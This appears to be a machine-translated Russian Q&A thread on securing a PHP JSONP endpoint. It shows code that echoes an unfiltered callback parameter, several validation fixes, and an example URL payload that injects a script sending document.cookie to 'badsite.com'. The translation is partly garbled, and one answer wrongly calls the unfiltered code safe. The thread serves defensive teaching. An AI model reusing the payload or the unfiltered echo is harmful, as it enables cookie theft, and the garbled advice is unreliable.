Безопасно ли это для обеспечения JSONP?

Question

<?php header('content-type: application/json'); 

$json = json_encode($data); 

echo isset($_GET['callback']) 
    ? "{$_GET['callback']}($json)" 
    : $json; 

Нужно ли, например, фильтровать переменную $_GET['callback'] так, чтобы она содержала только действительное имя функции JavaScript? Если да, то каковы действительные имена функций JavaScript?

Или не фильтрует эту переменную бит точки с помощью JSONP?

---

Текущее решение: Blogged о моем текущем растворе при http://www.geekality.net/?p=1021. Короче говоря, на данный момент у меня есть следующий код, который, надеюсь, должен быть довольно безопасным:

<?php header('content-type: application/json; charset=utf-8'); 

function is_valid_callback($subject) 
{ 
    $identifier_syntax 
     = '/^[$_\p{L}][$_\p{L}\p{Mn}\p{Mc}\p{Nd}\p{Pc}\x{200C}\x{200D}]*+$/u'; 

    $reserved_words = array('break', 'do', 'instanceof', 'typeof', 'case', 
     'else', 'new', 'var', 'catch', 'finally', 'return', 'void', 'continue', 
     'for', 'switch', 'while', 'debugger', 'function', 'this', 'with', 
     'default', 'if', 'throw', 'delete', 'in', 'try', 'class', 'enum', 
     'extends', 'super', 'const', 'export', 'import', 'implements', 'let', 
     'private', 'public', 'yield', 'interface', 'package', 'protected', 
     'static', 'null', 'true', 'false'); 

    return preg_match($identifier_syntax, $subject) 
     && ! in_array(mb_strtolower($subject, 'UTF-8'), $reserved_words); 
} 

$data = array(1, 2, 3, 4, 5, 6, 7, 8, 9); 
$json = json_encode($data); 

# JSON if no callback 
if(! isset($_GET['callback'])) 
    exit($json); 

# JSONP if valid callback 
if(is_valid_callback($_GET['callback'])) 
    exit("{$_GET['callback']}($json)"); 

# Otherwise, bad request 
header('Status: 400 Bad Request', true, 400); 

Answer 1

Нет, если вы намерены ограничить JSONP для выбора доменов. Также укажите кодировку, или люди, которые не могут получить доступ к JSON, могут совершать атаки UTF-7. Используйте этот заголовок вместо:

header('Content-Type: application/json; charset=utf-8'); 

Если это должно быть служба общественного JSONP, то да, это безопасно, а также использовать application/javascript вместо application/json.

Answer 2

Я думаю, что это безопасно. Пока вы не отгоняете $ _GET ['callback'] на другой странице без экранирования. Тот, кто делает запрос, может поставить все, что захочет в нем, я думаю, что это всегда будут его проблемы, а не ваши. На этой странице дается определение действительного имени функции js: http://www.functionx.com/javascript/Lesson05.htm

Answer 3

Чтобы быть в безопасности, вы должны закодировать callback, чтобы разрешать только действительные имена функций JS. Ничего сложного, просто не позволяйте конечным разработчикам вводить любой javascript. Вот код:

<?php 

    header('Content-Type: application/json; charset=utf-8'); // Thanks Eli 

    /** 
    * Ensures that input string matches a set of whitelisted characters and 
    * replaces unlisted ones with a replacement string (defaults to underscore). 
    * @param string $orig The original text to filter. 
    * @param string $replace The replacement string (default is underscore). 
    * @param string The original text with bad characters replaced with $replace. 
    * @link https://github.com/uuf6429/K2F/blob/master/K2F-DEV/core/security.php#L263 
    */ 
    function strtoident($orig,$replace=''){ 
     $orig=(string)$orig;     // ensure input is a string 
     for($i=0; $i<strlen($orig); $i++){ 
      $o=ord($orig{$i}); 
      if(!( (($o>=48) && ($o<=57))  // numbers 
       || (($o>=97) && ($o<=122)) // lowercase 
       || (($o>=65) && ($o<=90))  // uppercase 
       || ($orig{$i}=='_')))   // underscore 
        $orig{$i}=$replace;  // check failed, use replacement 
     } 
     return $orig; 
    } 

    $json=json_encode($data) 

    echo isset($_GET['callback']) 
     ? strtoident($_GET['callback']).'('.$json.');' 
     : $json; 

?> 

Edit:

Причина заключается в том, чтобы избежать хакеров указывая невинных жертв:

http://yoursite.com/jsonp.php?callback=(function(){ $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'); })// 

который может быть разбита на:

(function(){ 
    $(document.body).append(
     '<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>' 
    ); 
})//("whatever"); 

С последней частью t он вас закодировал, легко отменил с комментарием (хотя и ненужным для их использования для работы). В основном, хакер узнает файлы cookie пользователя (среди прочего), которые помогают ему получить доступ к учетной записи пользователя на вашем веб-сайте.

Редактировать: UTF-8 Совместимость. Чтобы обосновать мои претензии, read here. Или:

Как UTF-16 и UTF-32, UTF-8 может представлять каждый символ в наборе символов Юникода. В отличие от них, он обратно совместим с ASCII и избегает осложнений суждений и байтов байтов (BOM).